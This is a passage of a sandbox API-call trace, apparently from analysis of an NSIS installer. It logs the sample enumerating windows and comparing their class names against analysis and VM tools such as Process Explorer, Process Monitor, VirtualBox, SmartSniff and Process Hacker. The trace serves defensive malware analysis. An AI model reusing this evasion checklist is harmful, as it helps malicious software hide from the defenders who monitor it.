out: lpString1="3399936") returned="3399936" [0158.515] lstrlenA (lpString="3399936") returned 7 [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrlenA (lpString="") returned 0 [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrlenA (lpString="") returned 0 
[0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrlenA (lpString="") returned 0 [0158.516] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.516] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.516] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.516] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.516] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.517] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.517] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.517] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.517] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.517] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: 
lpString1="sysinternals") returned="sysinternals" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.517] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.517] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.517] lstrlenA (lpString="0") returned 1 [0158.517] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.517] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.518] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.518] 
lstrlenA (lpString="0") returned 1 [0158.518] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.518] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.518] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrlenA (lpString="3399936") returned 7 [0158.518] 
lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.518] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.518] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.519] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.519] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.519] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.519] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.519] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.519] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65668") returned 5 [0158.519] lstrcpyA (in: lpString1=0x430400, lpString2="65668" | out: lpString1="65668") returned="65668" [0158.519] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", 
iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrlenA (lpString="callback1") returned 9 [0158.519] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.519] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.519] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.519] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.520] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.520] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.520] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.520] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.520] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.520] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.520] lstrcpynA (in: lpString1=0x341200, lpString2="65668", iMaxLength=1024 | out: lpString1="65668") returned="65668" [0158.520] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] 
lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] GetWindowTextA (in: hWnd=0x10084, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.520] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.520] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.520] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65668") returned 5 [0158.520] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.520] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.521] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.521] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.521] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.521] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.521] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.521] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.521] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.521] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.521] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.521] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.521] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.521] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.521] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.521] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.521] lstrcpynA (in: lpString1=0x3401e0, lpString2="65668", iMaxLength=1024 | out: lpString1="65668") returned="65668" 
[0158.521] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.521] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.522] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.522] GetClassNameA (in: hWnd=0x10084, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.522] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.522] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65668") returned 5 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.522] lstrlenA (lpString="0") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", 
iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") 
returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, 
